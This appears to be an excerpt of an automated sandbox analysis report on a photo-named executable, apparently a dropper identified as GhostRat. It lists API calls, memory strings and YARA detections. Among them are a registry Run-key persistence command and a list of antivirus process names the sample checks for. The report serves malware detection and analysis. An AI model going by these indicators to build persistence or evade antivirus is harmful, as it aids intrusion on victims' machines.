                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, photo_2024-09-18_20-00-20.exe, 00000000.00000002.3289347334.0000000010017000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: Pragma: no-cacheGETlibcef.dllv4.0.30319%s%s\%slib%s%slalala123%text/0SafeMonClassSHELL_TrayWndShell_TrayWnd2.lnkreg.exeadd "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v demo /t REG_SZ /d ""file:///BkShadowWndClass1511617181920212223242526272829303132333435363738404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118120121122123124126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160invalid string positionstring too long
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,GetUserNameW,wsprintfW,GetFileAttributesW,wsprintfW,GetFileAttributesW,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_03EB5BF0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_03ED93C5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_03ED9305
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoA,4_2_03EDC31C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_03ED797C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_03ED9134
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_03ED88C6
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_03ED30DF
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_03ED90D9
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_03ED9032
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_03ED8F3D
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_03ED85D8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_03EDBCEC
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,4_2_03ECF4E5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,4_2_03ECF49F
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_03ED9468
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_03ED942C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_03EDBC12
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_6C3EFC04
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_6C3E5C68
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_6C3E4CBE
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_6C3EFCF0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: EnumSystemLocalesA,4_2_6C3EFCC6
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_6C3EFD57
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_6C3EFD93
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoA,4_2_6C3F3FD6
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6C3EF83C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_6C3EF931
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_6C3E594A
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_6C3EF9D8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_6C3EFA33
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_6C3EE436
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_6C3EE510
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_6C3DB122
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,4_2_6C3EF2B0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_03D8733B
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,4_2_03D82A9E
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_6C3EFC04
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,5_2_6C3E5C68
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_6C3E4CBE
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6C3EFCF0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: EnumSystemLocalesA,5_2_6C3EFCC6
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6C3EFD57
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_6C3EFD93
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoA,5_2_6C3F3FD6
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_6C3EF83C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_6C3EF931
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,5_2_6C3E594A
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_6C3EF9D8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_6C3EFA33
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,5_2_6C3EE436
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_6C3EE510
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,5_2_6C3DB122
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,5_2_6C3EF2B0
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004409D4 __EH_prolog3,GetLocalTime,0_2_004409D4
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB5BF0 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,GetUserNameW,wsprintfW,GetFileAttributesW,wsprintfW,GetFileAttributesW,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_03EB5BF0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ED498D __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,4_2_03ED498D
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0044A020 GetSystemInfo,GetVersionExW,0_2_0044A020
                      Source: 8VhJ2Jq.exeBinary or memory string: acs.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: kxetray.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: avcenter.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: vsserv.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: KSafeTray.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: cfp.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: avp.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: 360Safe.exe
                      Source: photo_2024-09-18_20-00-20.exe, 8VhJ2Jq.exeBinary or memory string: 360tray.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: rtvscan.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: TMBMSRV.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: ashDisp.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: 360Tray.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: avgwdsvc.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: AYAgent.aye
                      Source: 8VhJ2Jq.exeBinary or memory string: RavMonD.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: QUHLPSVC.EXE
                      Source: 8VhJ2Jq.exeBinary or memory string: Mcshield.exe
                      Source: 8VhJ2Jq.exeBinary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected GhostRat
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3cc1004.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3eb0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.3c01053.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.13b6033.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3d605bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3eb0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3d605bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.13faa9b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.13faa9b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.50b5a53.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.50b5a53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.3c01053.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.13b6033.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3cc1004.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.3859300120.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3697654357.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3913735905.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3913881702.0000000003EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3359487322.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3697596813.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3532200835.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3532247912.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3415028370.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3913806067.0000000003D60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3415028370.0000000005071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3914343860.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3378742070.0000000003C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
